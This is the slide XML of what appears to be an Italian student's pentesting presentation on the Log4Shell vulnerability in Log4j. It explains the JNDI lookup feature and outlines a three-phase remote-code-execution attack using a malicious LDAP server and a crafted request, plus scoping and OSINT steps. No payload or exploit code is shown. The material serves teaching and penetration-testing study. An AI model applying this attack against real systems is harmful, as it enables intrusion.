              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Docente: Prof. Arcangelo Castiglione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Studente: Mario Giordano</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Matricola: 0522500927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16773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DAFF0A87-5F96-A918-A546-FD714ADB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720" y="982980"/>
            <a:ext cx="448056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25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B38AA17-548E-0C0E-9F37-ED41E1D9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it-IT" dirty="0"/>
              <a:t>Plugin di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Lookup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F817D5-D599-B4E1-BD55-FEA6013AF4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sz="1700" dirty="0"/>
              <a:t>In sostanza, se la variabile da loggare è una URI JNDI, al fine di loggare il valore della variabile indicato, verrà effettuato un download dal server JNDI e verrà eseguito il file .class che conterrà l’EJB in questo modo andrà a buon fine l’operazione di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1700" dirty="0" err="1"/>
              <a:t>logging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1700" dirty="0"/>
              <a:t>.</a:t>
            </a:r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21" name="Picture 4" descr="Pannello sala server illuminato">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0837BCF4-0D99-7227-85A2-CBE049DEB1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359" r="29090" b="-1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03783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DAC283F9-0B45-EEB8-D9C4-45964C664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Plugin di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Lookup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60CD795-3B49-E124-36EB-A45B5DF74F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sz="1400" dirty="0"/>
              <a:t>Come visto nel codice precedentemente riportato il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Ctx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>lookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>è talmente avanzato da poter stampare valori di variabili di sistema e addirittura variabili presenti su EJB remoti. Questo ha portato ad una rapida diffusione della libreria di log questo perché permetteva di loggare eventuali configurazioni di macchine Docker che </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>hostavano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> gli applicativi permettendo di ricavare log utili durante dei comportamenti anomali delle macchine, o di risalire senza accedere alla macchina ad eventuali informazioni di sistema.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1263247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4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6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8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945B51E-780B-79B9-F319-10748917C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1346200"/>
            <a:ext cx="5624118" cy="32845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Log4Shell</a:t>
            </a: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2BE0-24FC-2C8E-5B20-9A137CFD4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86" r="29533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2012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73D2205-590C-C4E6-F9D1-54A91FC51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it-IT" sz="3000" dirty="0"/>
              <a:t>Log4Shell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DFC084A-1F41-ADE1-F037-0902AD9B2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spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="16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Il 9 dicembre 2021 è stata riportata una vulnerabilità 0-day, chiamata «Log4Shell", che permette l'esecuzione arbitraria di codice in Log4j. Secondo Wikipedia si tratta della "singola vulnerabilità più grossa e più critica dell'ultimo decennio.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="17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595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81FC64-B306-4821-98E2-780662EFC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4934D5-A3D2-6502-EA2D-373264E8D6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518" y="442913"/>
            <a:ext cx="5271804" cy="1639888"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Log4Shell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0528811-6E48-5226-8913-61417F281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519" y="2312988"/>
            <a:ext cx="5271804" cy="365125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sz="1700" dirty="0"/>
              <a:t>Questa vulnerabilità sfrutta l’ «intelligenza» del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1700" dirty="0" err="1"/>
              <a:t>Ctx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1700" dirty="0" err="1"/>
              <a:t>Lookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1700" dirty="0"/>
              <a:t> di Log4j. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1700" dirty="0"/>
              <a:t>In particolare quella del JNDI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1700" dirty="0" err="1"/>
              <a:t>lookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1700" dirty="0"/>
              <a:t> per permettere l’esecuzione arbitraria di codice all’interno dell’applicativo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="17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871FC61-DD4E-47D4-81FD-8A7E7D12B3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986049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29A1E2C-5AC8-40FC-99E9-832069D397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77485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5C54A75-E44A-4147-B9D0-FF46CFD31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54925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0FF262-D870-662F-0557-8F57ADCA6E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22" r="46265"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7203882" y="10"/>
            <a:ext cx="4988118" cy="6857990"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4901771" h="6858000">
                <a:moveTo>
                  <a:pt x="1623023" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2716256" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3496422" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4544484" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4710787" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4901771" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4901771" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4710787" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4544484" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3496422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14804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547C781-3A6C-B0A1-94C7-706587D76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it-IT" sz="2800" dirty="0"/>
              <a:t>Log4Shell</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="3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5727183-8478-8749-6C96-010D0937DC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La funzionalità estesa del </a:t>
            </a:r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err="1"/>
              <a:t>lookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> è molto utile per poter ricavare info su architetture e variabili a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>runtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> senza dover effettuare l’accesso alle macchine. Il problema di questa procedura è che dà per scontato che il server LDAP in questione sia un’entità </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>trusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Ma essendo potenzialmente indirizzabile un qualunque server LDAP, la sicurezza dell’architettura viene meno. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41714046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E913DC6-264C-3A64-CB4D-E2737FABD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Panoramica dell’attacco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CC3B97-6064-12BA-3702-B3BD3A718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4307991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L’attacco si articolerà in 3 fasi.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it-IT" dirty="0"/>
              <a:t>Si avvia un server LDAP malevolo che riceve comandi in input , ingloba questi comandi in un Java compilato tramite una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>runtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> (routine di java per eseguire comandi del sistema operativo)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it-IT" dirty="0"/>
              <a:t>Un HTTP server (solitamente lanciato insieme all’istanza di LDAP) per reindirizzare il traffico sulla porta dell’attaccante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it-IT" dirty="0"/>
              <a:t>Una richiesta all’app vulnerabile (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, post ,put) contente all’interno della </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> una URI all’LDAP malevolo, questa URI verrà loggata dal metodo di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>lookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc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78290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D9D3D7B7-9CC4-26DA-94AA-5B9CE8397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9" y="378296"/>
            <a:ext cx="11444557" cy="5824795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880640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B0F7D69-D93C-4C38-A23D-76E000D691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D419D4-EA9D-42D9-BF62-B07F0B7B6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C6FEC9B-9608-4181-A9E5-A1B80E720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B1564ED-F26F-451D-97D6-A6EC3E83FD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CA184B6-3482-4F43-87F0-BC765DCFD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6422" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3496422" h="6858000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1873399" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1895523" y="14997"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2922686" y="754641"/>
                  <a:pt x="3496422" y="2093192"/>
                  <a:pt x="3496422" y="3621656"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3496422" y="4969131"/>
                  <a:pt x="2567697" y="5602839"/>
                  <a:pt x="1622072" y="6374814"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1449869" y="6515397"/>
                  <a:pt x="1279242" y="6653108"/>
                  <a:pt x="1105424" y="6780599"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="99366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C869923-8380-4244-9548-802C330638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5409" y="0"/>
            <a:ext cx="2529723" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/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06255F2-BC67-4DDE-B34E-AC4BA21838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402" y="0"/>
            <a:ext cx="2536434" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/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169443-FCCD-4C0A-8C69-18CD3FA09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4161" y="0"/>
            <a:ext cx="2261351" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/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DBF1ABE-8590-450D-BB49-BDDCCF3EE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C1DD29C-4202-F234-0701-663A00893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0045" y="1346200"/>
            <a:ext cx="5624118" cy="3284538"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="109728" tIns="109728" rIns="109728" bIns="91440" rtlCol="0"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5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Pentesting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5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6CB0275-66F1-4491-93B8-121D0C717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14" y="0"/>
            <a:ext cx="5205951" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5205951"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1709529 w 5205951"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 2489695 w 5205951"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 3582928 w 5205951"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 3605052 w 5205951"/>
              <a:gd name="connsiteY4" fmla="*/ 14997 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 5205951 w 5205951"/>
              <a:gd name="connsiteY5" fmla="*/ 3621656 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 3331601 w 5205951"/>
              <a:gd name="connsiteY6" fmla="*/ 6374814 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 2814953 w 5205951"/>
              <a:gd name="connsiteY7" fmla="*/ 6780599 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 2703197 w 5205951"/>
              <a:gd name="connsiteY8" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 2489695 w 5205951"/>
              <a:gd name="connsiteY9" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 1709529 w 5205951"/>
              <a:gd name="connsiteY10" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 0 w 5205951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205951" h="6858000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1709529" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2489695" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3582928" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3605052" y="14997"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4632215" y="754641"/>
                  <a:pt x="5205951" y="2093192"/>
                  <a:pt x="5205951" y="3621656"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5205951" y="4969131"/>
                  <a:pt x="4277226" y="5602839"/>
                  <a:pt x="3331601" y="6374814"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3159398" y="6515397"/>
                  <a:pt x="2988771" y="6653108"/>
                  <a:pt x="2814953" y="6780599"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2703197" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2489695" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170952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8D32C3D-8F76-4E99-BE56-0836CC38C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84938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0FA34A-EC37-526C-02EF-5FED8E9CF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79" r="22479"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="153" y="10"/>
            <a:ext cx="5033023" cy="6857990"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4710787" h="6858000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1214365" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1994531" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3087764" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3109888" y="14997"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4137051" y="754641"/>
                  <a:pt x="4710787" y="2093192"/>
                  <a:pt x="4710787" y="3621656"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4710787" y="4969131"/>
                  <a:pt x="3782062" y="5602839"/>
                  <a:pt x="2836437" y="6374814"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2664234" y="6515397"/>
                  <a:pt x="2493607" y="6653108"/>
                  <a:pt x="2319789" y="6780599"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2208033" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1994531" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12143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70766076-46F5-42D5-A773-2B3BEF2B8B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925575" y="0"/>
            <a:ext cx="2486322" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 879731 w 2521425"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 898402 w 2521425"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 920526 w 2521425"/>
              <a:gd name="connsiteY2" fmla="*/ 14997 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 2521425 w 2521425"/>
              <a:gd name="connsiteY3" fmla="*/ 3621656 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 647075 w 2521425"/>
              <a:gd name="connsiteY4" fmla="*/ 6374814 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 130427 w 2521425"/>
              <a:gd name="connsiteY5" fmla="*/ 6780599 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 18671 w 2521425"/>
              <a:gd name="connsiteY6" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 2521425"/>
              <a:gd name="connsiteY7" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 111756 w 2521425"/>
              <a:gd name="connsiteY8" fmla="*/ 6780599 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 628404 w 2521425"/>
              <a:gd name="connsiteY9" fmla="*/ 6374814 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 2502754 w 2521425"/>
              <a:gd name="connsiteY10" fmla="*/ 3621656 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 901855 w 2521425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1425" h="6858000">
                <a:moveTo>
                  <a:pt x="879731" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="898402" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="920526" y="14997"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1947689" y="754641"/>
                  <a:pt x="2521425" y="2093192"/>
                  <a:pt x="2521425" y="3621656"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2521425" y="4969131"/>
                  <a:pt x="1592700" y="5602839"/>
                  <a:pt x="647075" y="6374814"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="474872" y="6515397"/>
                  <a:pt x="304245" y="6653108"/>
                  <a:pt x="130427" y="6780599"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18671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739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1C108E0-45CA-A925-9B43-D295C7029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Log4J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54E4C5-E53B-1E9E-D243-DE7DEB591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Log4J è una libreria impiegata per la stampa dei log applicativi.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Essa è ampiamente utilizzata nei contesti delle applicazioni web, in particolare nei framework J2E quali ad esempio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>springboot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03031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50FFBE8-2D3A-9752-FD13-21A0B5750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sz="3000" dirty="0"/>
              <a:t>Target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3000" dirty="0" err="1"/>
              <a:t>Scoping</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="3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B0C1840-B414-1081-CF8E-6DDE957C4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 fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Nella fase di target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Scoping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> andremo a definire tramite un accordo tra le parti specificando i confini del test che andremo a svolgere.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>In questo caso definiremo come asset la macchina situato sulla macchina </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>. Ovvero il server della web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> presente sulla porta 8080.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>In questo caso definiremo come obiettivo la remote code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>  RCE dell’asset da verificare.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62723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C58ECE2-1B5E-0DB4-B21D-7054E26979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it-IT" sz="3000" dirty="0"/>
              <a:t>Target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3000" dirty="0" err="1"/>
              <a:t>Scoping</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="3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DF7BAE2-F54F-3AC7-0011-53C95E582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L’impatto dell’attacco in questo caso non sarà significativo ai fini dell’utilizzo lecito da parte delle risorse, in quanto l’unico </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>effort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> che la macchina dovrà impiegare è quello di rispondere a delle chiamate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>rest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>. Essendo quindi l’applicativo un server di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>backend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> e le chiamate svolte dall’uomo , non costituirà un carico eccessivo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc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53382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001D9E5-757A-20B8-5213-DF4ADEA60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Information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Gathering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FB04351-443B-F038-A117-3EF84A6A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In questa fase raccoglieremo tutte le informazioni necessarie all’attacco. In particolare faremo l’uso di OSINT (open source intelligence) ovvero indagheremo sulle fonti aperte per poter ricavare tutti i dettagli del caso.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18496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69A4D47-AAE6-B937-45AA-7EC0C51A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Information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Gathering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71D872-6679-73D1-58E1-18BD62438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 lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Supponiamo che questo sia un attacco 0-day e quindi una vulnerabilità di log4j non nota, in questo caso potremmo aspettarci il seguente comportamento:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>se il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>pentester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> dispone di sufficiente esperienza in ambito web app, è molto probabile che si tenga aggiornato su quelli che sono i vari seminari sulla sicurezza di associazioni quali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>RedHat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89927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A4D47-AAE6-B937-45AA-7EC0C51A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Information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Gathering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71D872-6679-73D1-58E1-18BD62438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Quindi la sua esperienza sarebbe tale da permettergli sapere che log4j sia il sistema di log più impiegato lato </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>backend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> (e quindi anche assumere che l’applicativo da analizzare impieghi questa libreria).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40243577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A4D47-AAE6-B937-45AA-7EC0C51A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Information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Gathering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71D872-6679-73D1-58E1-18BD62438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A questo punto si ci documenta ulteriormente sulla libreria in questione dalla documentazione ufficiale, analizzando le varie parti che la compongono e determinati metodi. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Ad un certo punto della lettura si ci trova di fronte ad metodo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Lookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-I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93332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A4D47-AAE6-B937-45AA-7EC0C51A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Information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Gathering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71D872-6679-73D1-58E1-18BD62438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Quello che salta maggiormente all’occhio è la capacità di loggare variabili una volta fornite le URI LDAP a partire da file java compilati.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>A questo punto si cerca in rete informazioni in merito a vulnerabilità/manomissioni LDAP.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11547639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A4D47-AAE6-B937-45AA-7EC0C51A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Information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Gathering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3AF06A06-8CCE-B079-C118-4A01A9836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874" y="2240691"/>
            <a:ext cx="8771839" cy="1649566"/>
          </a:xfr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8D8BC243-E8F5-F92F-E747-05C815F0A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74" y="3890258"/>
            <a:ext cx="8771838" cy="2584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738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9A4D47-AAE6-B937-45AA-7EC0C51ABF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Information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Gathering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71D872-6679-73D1-58E1-18BD62438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Sebbene la vulnerabilità di log4shell sia diventata minaccia nel momento in cui l’attacco è stato effettuato (2021) , ci rendiamo conto che in realtà già 5 anni prima black </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
